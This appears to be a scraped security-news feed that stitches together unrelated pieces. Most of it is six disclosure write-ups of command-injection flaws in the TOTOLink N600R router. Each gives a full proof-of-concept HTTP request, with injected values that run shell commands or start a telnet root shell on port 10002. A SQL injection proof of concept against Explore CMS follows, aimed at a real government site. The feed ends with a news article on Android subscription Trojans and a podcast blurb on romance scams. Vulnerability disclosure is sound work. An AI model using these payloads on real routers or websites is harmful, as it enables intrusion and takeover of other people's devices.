TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the devicename parameter in /setting/setDeviceName.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The program passes the content obtained through the devicename parameter to V7, then passes the matching content to v18 through the sprintf function, and finally executes the content in v18 through the system function. There is a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 145
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/setDeviceName",
    	"file_exist":"1",
    	"num":"1",
    	"deviceMac":"1",
    	"deviceName":"';telnetd -l /bin/sh -p 10002;'“
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28910: IOT_vuln/TOTOLink/N600R/9 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the webwlanidx parameter in /setting/setWebWlanIdx.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the webwlanidx parameter is passed to V5, and then the matching content is passed to V7 through the sprintf function, and then V7 is brought into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 145
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/setWebWlanIdx",
    	"webWlanIdn":"0test$(ls>/tmp/4.txt;)"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28909: IOT_vuln/TOTOLink/N600R/3 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the langtype parameter in /setting/setLanguageCfg.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the langtype parameter is passed to V6, and then the matched content is formatted into V9 through the sprintf function, and V9 is brought into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 135
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647869489:2
    Connection: close
    
    {"topicurl":"setting/setLanguageCfg",
    "langType":"cn$(1s>/tmp/2.txt)"
    	"operationMode":	0,
    	"loginFlag":	0,
    	"lanIp":	"192.168.0.1",
    	"wanConnStatus":	"connected",
    	"multiLangBt":	"",
    	"langFlag":	0,
    	"helpBt":	1,
    	"languageType":	"cnnn",
    	"helpUrl_":	"",
    	"productName":	"N600R",
    	"fmVersion":	"V5.3c.7159",
    	"webTitle":	"",
    	"copyRight":	"",
    	"autoLangBt":	0,
    	"CSID":	"CS160R"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28906: IOT_vuln/TOTOLink/N600R/2 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the hosttime function in /setting/NTPSyncWithHost.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the hosttime function is passed to V5, and then V5 passes the matched content to V10 through the sprintf function, and then brings V10 into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/NTPSyncWithHost",
    "hostTime":"test.com$(ls>/tmp/6.txt;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28907: IOT_vuln/TOTOLink/N600R/5 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the ipdoamin parameter in /setting/setDiagnosisCfg.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the ipdoamin parameter is passed to V6, and then the matched content is passed to V8 through the sprintf function, and then V8 is brought into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 79
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/status.asp?timestamp=1647872753309
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647872744:2
    Connection: close
    
    {"topicurl":"setting/setDiagnosisCfg",
    "ipDoamin":"test.com$(ls>/tmp/5.txt;)"}
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28908: IOT_vuln/TOTOLink/N600R/4 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the devicemac parameter in /setting/setDeviceName.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The content obtained by the program through the devicemac parameter is passed to V6, and then the content matched by V6 is formatted into v18 through the sprintf function. Finally, v18 is executed through the system function. There is a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 145
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {
    	"topicurl":"setting/setDeviceName",
    	"file_exist":"1",
    	"num":"1",
    	"deviceMac":"';telnetd -l /bin/sh -p 10002;'",
    	"deviceName":"zoe"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28905: IOT_vuln/TOTOLink/N600R/1 at main · EPhaha/IOT_vuln

Some mobile apps are being weaponized with Trojans that secretly sign Android users up for paid subscription services.

Several Android mobile Trojans are circulating in the wild that surreptitiously sign users up for paid services and take a cut for the scammers from the money that is billed. Many of these are getting around Google Play's official app store security measures.

Researchers from Kaspersky who have been tracking these most recent so-called "fleeceware" threats for the past several months say the malware is often capable of bypassing bot detection mechanisms on sites for paid services, and can even subscribe unsuspecting mobile device users to the scammers' own non-existent services.

The malware is often hidden within otherwise benign mobile applications such as healthcare apps, photo editors, and popular games on Google's Play mobile app store and other stores. The weaponized apps keep resurfacing almost as quickly as they are detected and removed, Kaspersky said.

Many of the applications ask for permission to access the user's notifications and messages. If those permissions are granted, the malware then intercepts and hijacks messages containing confirmation codes for their subscription, therefore leaving the users unaware they had just been subscribed to a paid service.

In a report, Kaspersky highlights four of the most widely spread Trojans in this category that it has observed in recent months — Jocker, MobOk, GriftHorse.l, and Vesub. The vendor estimates a startling 70% of Android device users had encountered subscription Trojans such as these at some point.

**Four of the Worst**  
Kaspersky identifies MobOk as the most active of the four threats. The malware was first spotted within an infected app on Google Play, but more recently it has been seen getting distributed as a payload of Triada — another mobile Trojan often hidden within preinstalled system apps on some smartphones. Kaspersky says it has observed the malware on the APK Pure Android mobile app store, hidden inside what the vendor described as a widely used modification of WhatsApp Messenger.

Once installed on a system, MobOk works by opening a subscription page to a paid service in an invisible window. If the malware has been granted access to the user's notification service, it intercepts any confirmation code that the paid service might send to the device and uses that to confirm the subscription. One feature that sets MobOk apart from the other mobile Trojans is its ability to solve CAPTCHAs on subscription sites, Kaspersky says. A plurality of the MobOk infections that the vendor observed were in Russia, followed by India and Indonesia.

Jocker, meanwhile, is malware that Kaspersky recently found hidden within messaging apps, blood pressure monitoring software, document scanning apps, and other products on Google Play. Jocker is a long-known mobile threat that continuously changes up its tactics to continue to infiltrate the official app store.

In many cases scammers download legitimate versions of these apps from Google's app store, then insert Jocker code into it and re-upload them to the store under a different name, Kaspersky says. The malware was coded to remain dormant during Google's app vetting process but to become active when the application goes live. Like MobOk, Jocker too is designed to intercept text messages or notifications containing confirmation codes and using them to sign users up for paid subscription services without their knowledge.

The current version of the malware uses a staged download process — involving four files — to install the final component of the malware on end-user systems. It adopted the technique to try to avoid malware-detection mechanisms, Kaspersky notes. Researchers from the company observed the malware being used most frequently against Android users in Saudi Arabia, Poland, and Germany.

Vesub, meanwhile, is mobile malware that Android users can encounter on unofficial app stores. The malware is hidden within spoofed versions of popular game apps that actually contain no legitimate functionality. When installed, the malware straightaway attempts to start subscribing users to paid services, while all that a user sees is a window suggesting that the app is still loading. Like most subscription Trojans, Vesub works only if it has been granted permission to access text messages or notifications. Kaspersky found the malware to be predominant in Egypt, Thailand, and Malaysia.

And finally, GriftHorse.l is different from the other malware in that it subscribes users to the malware author's own paid services, such as apps that promise to take users on a weight-loss plan for a fee. Users who sign up for these plans often do so without realizing that they are signing up for a service with periodic payments and automatic billing, Kaspersky says.

Richard Melick, director of threat reporting at Zimperium, says malware such as these should not be considered a consumer-only threat. "Organizations of all sizes must start realizing that there is no such thing as a consumer-only threat in the world of BYOD," he said, in emailed comments. "Each time Jocker and other long-standing malware go through an update, they continue to put critical data, services, and attack surfaces at risk."

Security teams need to ensure they have the same kind of security architecture for mobile endpoints as they have for traditional devices.

Both Google and Apple have implemented numerous measures over the years to prevent scammers from uploading malware to their respective mobile app stores. While the measures have helped limit malicious apps to a certain extent, security vendors have continued to find malware on these stores on a regular basis. Just last month, for instance, Google scrambled to remove at least six applications masquerading as legitimate antivirus tools that were in reality being used to drop a banking Trojan called SharkBot. Check Point estimated the malware tools were downloaded more than 15,000 times before Google removed them from Google Play.

Jocker, Other Fleeceware Surges Back Into Google Play

Explore CMS v1.0 was discovered to contain a SQL injection vulnerability via a /page.php?id= request.

    # Exploit Title: explore CMS  - Boolean Based SQL Injection# Date: 19/03/2022# Exploit Author: Sajibe Kanti# Vendor Name : EXPLORE IT# Vendor Homepage: https://exploreit.com.bd# CVE: On Request# POC#SQL InjectionSQL injection is a web security vulnerability that allows an attackerto interfere with the queries that an application makes to itsdatabase.explore CMS is vulnerable to the SQL Injection in 'id' parameter ofthe 'page' page.#Steps to reproduceFollowing URL is vulnerable to SQL Injection in the 'id' field.GET /page.php?id=1%27%20OR%201%3d1%20OR%20%27ns%27%3d%27ns HTTP/1.1Host: www.gdc.gov.bdAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-us,en;q=0.5Cache-Control: no-cacheCookie: PHPSESSID=b4c39f2ff3b9470f39bc088ab9ba9320Referer: https://www.gdc.gov.bd/User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36HTTP/1.1 200 OKcontent-encoding:server: LiteSpeedConnection: Keep-AliveKeep-Alive: timeout=5, max=100content-type: text/html; charset=UTF-8transfer-encoding: chunkeddate: Thu, 17 Mar 2022 07:27:21 GMTvary: Accept-Encoding10.3.34-MariaDBServer accepts the payload and the response get delayed by 7 seconds.#ImpactAn attcker can compromise the database of the application by manualmethod or by automated tools such as SQLmap.-- ThanksSajibe Kanti

CVE-2022-27412: Explore CMS 1.0 SQL Injection ≈ Packet Storm

This week on Lock and Code, we speak with Cindy Liebes about the financial and emotional damage caused by romance scams and how to spot them.
The post Recovering from romance scams with Cindy Liebes: Lock and Code S03E10 appeared first on Malwarebytes Labs.

Earlier this year, many members of the public were introduced to the facets of a long-ignored crime in cyberspace: The romance scam. A flashy documentary called The Tinder Swindler had premiered on Netflix, and in it, filmmakers documented the efforts of one man to manipulate several women into giving him tens of thousands of dollars after sometimes convincing them that he was their one true love.

Immediately after the documentary premiered, viewers judged the victims. Some viewers blamed the women in the documentary for falling for what looked, externally, like an obvious scam. Others asked how the women could be swept off their feet with so many red flags present? Others blamed the victims for not doing better research into the man, who had worked tirelessly to build fraudulent websites that claimed he was the son of a billionaire diamond miner.

But according to Cindy Liebes, Chief Cybersecurity Evangelist for Cybercrime Support Network, this public perception misses a lot, particularly in how skilled these scammers can be in their work.

> “These people are professional criminals… and I think a lot of times, for those who may say, ‘Well I would never fall for this’—they don’t realize how professional these people are.”
> 
> Cindy Liebes, Chief Cybersecurity Evangelist for Cybercrime Support Network

This week on the Lock and Code podcast with host David Ruiz, we speak with Liebes about the facts behind romance scams: How prevalent they are, the types of damage they cause beyond financial ruin, and how you can spot a romance scam as it is happening.

Tune in to hear all this and more on this week’s Lock and Code podcast by Malwarebytes Labs.

This video cannot be displayed because your _Functional Cookies_ are currently disabled.

To enable them, please visit our _privacy policy_ and search for the Cookies section. Select _“Click Here”_ to open the Privacy Preference Center and select _“Functional Cookies”_ in the menu. You can switch the tab back to _“Active”_ or disable by moving the tab to _“Inactive.”_ Click _“Save Settings.”_

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “God God” by Wowa (unminus.com)

Tag

#apple